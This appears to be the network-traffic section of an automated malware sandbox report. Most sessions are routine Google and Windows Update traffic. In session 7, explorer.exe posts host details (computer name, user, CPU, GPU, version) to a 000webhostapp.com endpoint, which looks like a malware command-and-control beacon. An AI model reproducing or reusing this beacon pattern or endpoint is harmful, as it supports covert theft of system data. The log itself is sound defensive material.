SameSite=none Set-Cookie: NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg; expires=Sat, 26-Oct-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 14:48:11 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:10 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 14:48:11 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIq_2usQYQnIrstAESBGaBmNw Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 14:48:11 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-14; expires=Sun, 26-May-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=HR0V9wKUcTQOQQwMaEeki6_3HwjVRL2ayLc7xFtv9eWyVkhuXeYblBvhiMcHf-Ir85lBUdatIIyPQXk_8jaJdMWPHGulp8WgK0jg6oJYSqdLN2K9wUgzsHMYnaCHISF0M8jT-BPGZEX-uTOHMGZJlJB-lVBV7L0_sXvwookG2Ts; expires=Sat, 26-Oct-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 14:48:11 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:11 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
2024-04-26 14:48:12 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 14:48:12 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3114 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 14:48:12 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 14:48:12 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 68 6a 6c 71 35 7a 53 56 71 33 31 73 52 66 49 51 63 48 63 41 59 67 5a 34 45 6c 55 73 4b 2d 39 41 67 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="hjlq5zSVq31sRfIQcHcAYgZ4ElUsK-9Ag
2024-04-26 14:48:12 UTC	960	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	142.250.64.196	443	7880	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:12 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
2024-04-26 14:48:12 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 14:48:12 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3186 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 14:48:12 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-26 14:48:12 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 34 6b 62 52 38 66 30 69 73 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="4kbR8f0is
2024-04-26 14:48:12 UTC	1032	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 14:48:21 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: b023e083-0215-4b29-9786-80c6301737ee MS-RequestId: 68210b24-5eae-4125-ac50-5ec3c29f9822 MS-CV: HKTPMJvS4kSgP1T8.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 14:48:21 GMT Connection: close Content-Length: 24490
2024-04-26 14:48:21 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-26 14:48:21 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	145.14.144.253	443	4488	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:32 UTC	197	OUT	POST /api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 484 Content-Type: application/json Host: pachydermal-deviati.000webhostapp.com User-Agent: cpp-httplib/0.12.6
2024-04-26 14:48:32 UTC	484	OUT	Data Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 33 2c Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":3,
2024-04-26 14:48:32 UTC	304	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 14:48:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Robots-Tag: noindex, nofollow Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 21cfdd90ae429e7b7eb015eb92ffab10
2024-04-26 14:48:32 UTC	23	IN	Data Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a Data Ascii: 11{"response":"ok"}
2024-04-26 14:48:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 14:48:59 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 14:49:00 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: fda3a476-e7c4-43ad-b075-103dbdb9d695 MS-RequestId: b8cba2c9-ff63-4ea2-ae10-8f2ce9d1ff23 MS-CV: YfircFfu3EGQg4T2.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 14:48:59 GMT Connection: close Content-Length: 25457
2024-04-26 14:49:00 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-26 14:49:00 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 